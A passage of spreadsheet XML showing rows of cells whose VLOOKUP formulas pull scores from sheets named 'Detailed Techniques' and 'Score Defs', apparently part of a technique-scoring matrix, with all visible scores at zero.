      <c r="L7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M7" s="12" t="s">
        <v>65</v>
      </c>
      <c r="N7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O7" s="12" t="s">
        <v>66</v>
      </c>
      <c r="P7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q7" s="12" t="s">
        <v>67</v>
      </c>
      <c r="R7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S7" s="12" t="s">
        <v>68</v>
      </c>
      <c r="T7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U7" s="8" t="s">
        <v>69</v>
      </c>
      <c r="V7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A8" s="12" t="s">
        <v>70</v>
      </c>
      <c r="B8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C8" s="12" t="s">
        <v>71</v>
      </c>
      <c r="D8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E8" s="12" t="s">
        <v>72</v>
      </c>
      <c r="F8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>34</v>
      </c>
      <c r="H8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I8" s="12" t="s">
        <v>73</v>
      </c>
      <c r="J8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K8" s="12" t="s">
        <v>74</v>
      </c>
      <c r="L8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M8" s="12" t="s">
        <v>75</v>
      </c>
      <c r="N8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O8" s="12" t="s">
        <v>76</v>
      </c>
      <c r="P8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q8" s="12" t="s">
        <v>77</v>
      </c>
      <c r="R8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S8" s="12" t="s">
        <v>78</v>
      </c>
      <c r="T8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U8" s="8" t="s">
        <v>79</v>
      </c>
      <c r="V8" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U8,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A9" s="12" t="s">
        <v>61</v>
      </c>
      <c r="B9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C9" s="12" t="s">
        <v>80</v>
      </c>
      <c r="D9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E9" s="12" t="s">
        <v>81</v>
      </c>
      <c r="F9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G9" s="12" t="s">
        <v>82</v>
      </c>
      <c r="H9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I9" s="12" t="s">
        <v>83</v>
      </c>
      <c r="J9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K9" s="12" t="s">
        <v>84</v>
      </c>
      <c r="L9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M9" s="12" t="s">
        <v>85</v>
      </c>
      <c r="N9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O9" s="12" t="s">
        <v>86</v>
      </c>
      <c r="P9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q9" s="12" t="s">
        <v>87</v>
      </c>
      <c r="R9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S9" s="12" t="s">
        <v>88</v>
      </c>
      <c r="T9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U9" s="8" t="s">
        <v>89</v>
      </c>
      <c r="V9" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U9,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:24" x14ac:dyDescent="0.45">
      <c r="A10" s="12" t="s">
        <v>72</v>
      </c>
      <c r="B10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C10" s="12" t="s">
        <v>34</v>
      </c>
      <c r="D10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E10" s="12" t="s">
        <v>90</v>
      </c>
      <c r="F10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G10" s="12" t="s">
        <v>91</v>
      </c>
      <c r="H10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I10" s="12" t="s">
        <v>92</v>
      </c>
      <c r="J10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K10" s="12" t="s">
        <v>93</v>
      </c>
      <c r="L10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M10" s="12" t="s">
        <v>94</v>
      </c>
      <c r="N10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O10" s="12" t="s">
        <v>82</v>
      </c>
      <c r="P10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q10" s="12" t="s">
        <v>95</v>
      </c>
      <c r="R10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S10" s="12" t="s">
        <v>96</v>
      </c>
      <c r="T10" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V10" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U10,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="11" spans="1:24" ht="39" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A11" s="12" t="s">
        <v>97</v>
      </c>
      <c r="B11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C11" s="12" t="s">
        <v>98</v>
      </c>
      <c r="D11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E11" s="12" t="s">
        <v>60</v>
      </c>
      <c r="F11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G11" s="12" t="s">
        <v>99</v>
      </c>
      <c r="H11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I11" s="12" t="s">
        <v>100</v>
      </c>
      <c r="J11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K11" s="12" t="s">
        <v>101</v>
      </c>
      <c r="L11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M11" s="12" t="s">
        <v>102</v>
      </c>
      <c r="N11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O11" s="12" t="s">
        <v>103</v>
      </c>
      <c r="P11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q11" s="3"/>
      <c r="R11" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S11" s="12" t="s">
        <v>104</v>
      </c>
      <c r="T11" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V11" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U11,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="12" spans="1:24" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A12" s="12" t="s">
        <v>71</v>
      </c>
      <c r="B12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C12" s="12" t="s">
        <v>105</v>
      </c>
      <c r="D12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E12" s="12" t="s">
        <v>71</v>
      </c>
      <c r="F12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G12" s="12" t="s">
        <v>106</v>
      </c>
      <c r="H12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I12" s="12" t="s">
        <v>107</v>
      </c>
      <c r="J12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K12" s="12" t="s">
        <v>108</v>
      </c>
      <c r="L12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M12" s="12" t="s">
        <v>109</v>
      </c>
      <c r="N12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O12" s="12" t="s">
        <v>110</v>
      </c>
      <c r="P12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q12" s="3"/>
      <c r="R12" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S12" s="12" t="s">
        <v>111</v>
      </c>
      <c r="T12" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V12" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U12,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="13" spans="1:24" ht="28.5" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A13" s="12" t="s">
        <v>80</v>
      </c>
      <c r="B13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C13" s="12" t="s">
        <v>112</v>
      </c>
      <c r="D13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E13" s="12" t="s">
        <v>113</v>
      </c>
      <c r="F13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G13" s="12" t="s">
        <v>114</v>
      </c>
      <c r="H13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I13" s="12" t="s">
        <v>115</v>
      </c>
      <c r="J13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K13" s="12" t="s">
        <v>116</v>
      </c>
      <c r="L13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M13" s="12" t="s">
        <v>117</v>
      </c>
      <c r="N13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O13" s="8" t="s">
        <v>118</v>
      </c>
      <c r="P13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q13" s="3"/>
      <c r="R13" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S13" s="12" t="s">
        <v>84</v>
      </c>
      <c r="T13" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V13" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U13,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="14" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A14" s="12" t="s">
        <v>119</v>
      </c>
      <c r="B14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C14" s="12" t="s">
        <v>120</v>
      </c>
      <c r="D14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E14" s="12" t="s">
        <v>34</v>
      </c>
      <c r="F14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G14" s="12" t="s">
        <v>121</v>
      </c>
      <c r="H14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I14" s="12" t="s">
        <v>122</v>
      </c>
      <c r="J14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
